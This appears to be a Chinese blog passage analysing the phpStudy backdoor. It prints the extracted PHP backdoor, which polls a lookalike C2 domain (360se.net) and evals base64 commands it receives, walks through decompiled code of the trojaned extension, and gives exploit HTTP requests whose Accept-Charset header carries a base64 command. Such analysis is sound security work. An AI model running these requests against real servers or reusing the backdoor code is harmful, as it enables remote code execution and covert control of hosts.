v42数据
@ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10); if( !$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !$handle ){ return "err"; } } fwrite($handle, $sendMsg."n"); while(!feof($handle)){ stream_set_timeout($handle, 2); $result .= fread($handle, 1024); $info = stream_get_meta_data($handle); if ($info['timed_out']) { break; } } fclose($handle); return $result; } $ds = array("www","bbs","cms","down","up","file","ftp"); $ps = array("20123","40125","8080","80","53"); $n = false; do { $n = false; foreach ($ds as $d){ $b = false; foreach ($ps as $p){ $result = tcpGet($i,$d.".360se.net",$p); if ($result != "err"){ $b =true; break; } } if ($b)break; } $info = explode("<^>",$result); if (count($info)==4){ if (strpos($info[3],"/*Onemore*/") !== false){ $info[3] = str_replace("/*Onemore*/","",$info[3]); $n=true; } @eval(base64_decode($info[3])); } }while($n);v42脚本:后门c2服务器(360se.net)(当前c2已经失活,因此不会对相关被控主机造成新的危害)
ps:从上面v41、v42数据的提取过程,可以发现攻击者对数据进行了压缩存储,增加了恶意代码的隐蔽性,同时c2服务器域名模仿了奇虎360公司相关产品名称,具有一定的欺诈特性 。
实验:phpStudy后门漏洞复现
http://www.hetianlab.com/expc.do?ec=ECID1387-c383-454e-9448-6460e0f4581f
分析反向连接c2后门
核心代码
v12 = strcmp(**v34, aCompressGzip); // //compress,gzip if ( !v12 ) { v13 = &byte_10012884; v14 = (char *)&unk_1000D66C; v42 = &byte_10012884; v15 = &unk_1000D66C; while ( 1 ) { if ( *v15 == 39 ) { v13[v12] = 92; v42[v12 + 1] = *v14; v12 += 2; v15 += 2; } else { v13[v12++] = *v14; ++v15; } v14 += 4; if ( (signed int)v14 >= (signed int)&unk_1000E5C4 ) break; v13 = v42; } spprintf(&v36, 0, aVSMS, byte_100127B8, Dest); spprintf(&v42, 0, aSEvalSS, v36, aGzuncompress, v42); v16 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v17 = *(void **)(v16 + 296);分析代码逻辑,首先想要执行
spprintf(&v42, 0, aSEvalSS, v36, aGzuncompress, v42);必须满足if( !v12 )
v12 = strcmp(**v34, aCompressGzip);if ( !v12 )
文章插图
定位aCompressGzip,只要ACCEPT_ENCODING等于compress,gzip即可出发v42恶意代码
构造相应Payload:
GET / HTTP/1.1Host: x.x.x.x…..Accept-Encoding:compress,gzip….ps:由于C2服务器已经失效,不在进行后续操作
分析正向连接RCE
在C2后门基础上向上接着分析
核心代码
if ( zend_hash_find(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 216, aServer, strlen(aServer) + 1, &v39) != -1 && zend_hash_find(**v39, aHttpAcceptEnco, strlen(aHttpAcceptEnco) + 1, &v34) != -1 ) { if ( !strcmp(**v34, aGzipDeflate) ) { if ( zend_hash_find(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 216, aServer, strlen(aServer) + 1, &v39) != -1 && zend_hash_find(**v39, aHttpAcceptChar, strlen(aHttpAcceptChar) + 1, &v37) != -1 ) { v40 = sub_100040B0(**v37, strlen((const char *)**v37)); if ( v40 ) { v4 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4); v5 = *(_DWORD *)(v4 + 296); *(_DWORD *)(v4 + 296) = &v30; v35 = v5; v6 = setjmp3(&v30, 0); v7 = v35; if ( v6 ) *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v35; else zend_eval_string(v40, 0, &byte_10012884, a3); *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v7; } } }分析代码逻辑
第一个if(),判断是否存在HTTP_ACCEPT_ENCODING字段,$_SERVER['HTTP_ACCEPT_ENCODING'] 为当前请求的Accept-Encoding:头部信息的内容 。
第二个if(),在第一个if()基础上,判断$_SERVER['HTTP_ACCEPT_ENCODING']字段值是否是gzip,deflate 。
第三个if(),在前两个if()的基础上,判断是否存在HTTP_ACCEPT_CHARSET字段,$_SERVER['HTTP_ACCEPT_CHARSET']为当前请求的Accept-Charset:头部信息的内容 。
最后,在前三个if()的基础上,提取HTTP_ACCEPT_CHARSET字段值,并对该值进行base64解码,然后调用zend_eval_string(v40,0, &byte_10012884, a3); 执行RCE 。
构造相应Payload:
GET / HTTP/1.1Host: x.x.x.x…..Accept-Encoding: gzip,deflateAccept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==….EXP利用
后门RCE
exp构造
GET /phpinfo.php HTTP/1.1Host: 192.168.43.146User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip,deflateAccept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==Connection: closeUpgrade-Insecure-Requests: 1
推荐阅读
- 如何解决最新PHPstudy”后门事件”网站被挂木马
- phpstudy中apache无法启动怎么解决?
- phpStudy V8.0建立网站的方法及图文教程
- 网站漏洞检测 关于phpstudy后门的分析与修复
- 金骏眉红茶营养价值,深度分析
- phpstudy如何安装ssl证书
- phpStudy隐藏后门预警
- 滇红茶好处,深度分析
- 深度分析滇红茶的好处
- 深度分析:你手机的电量去哪儿了?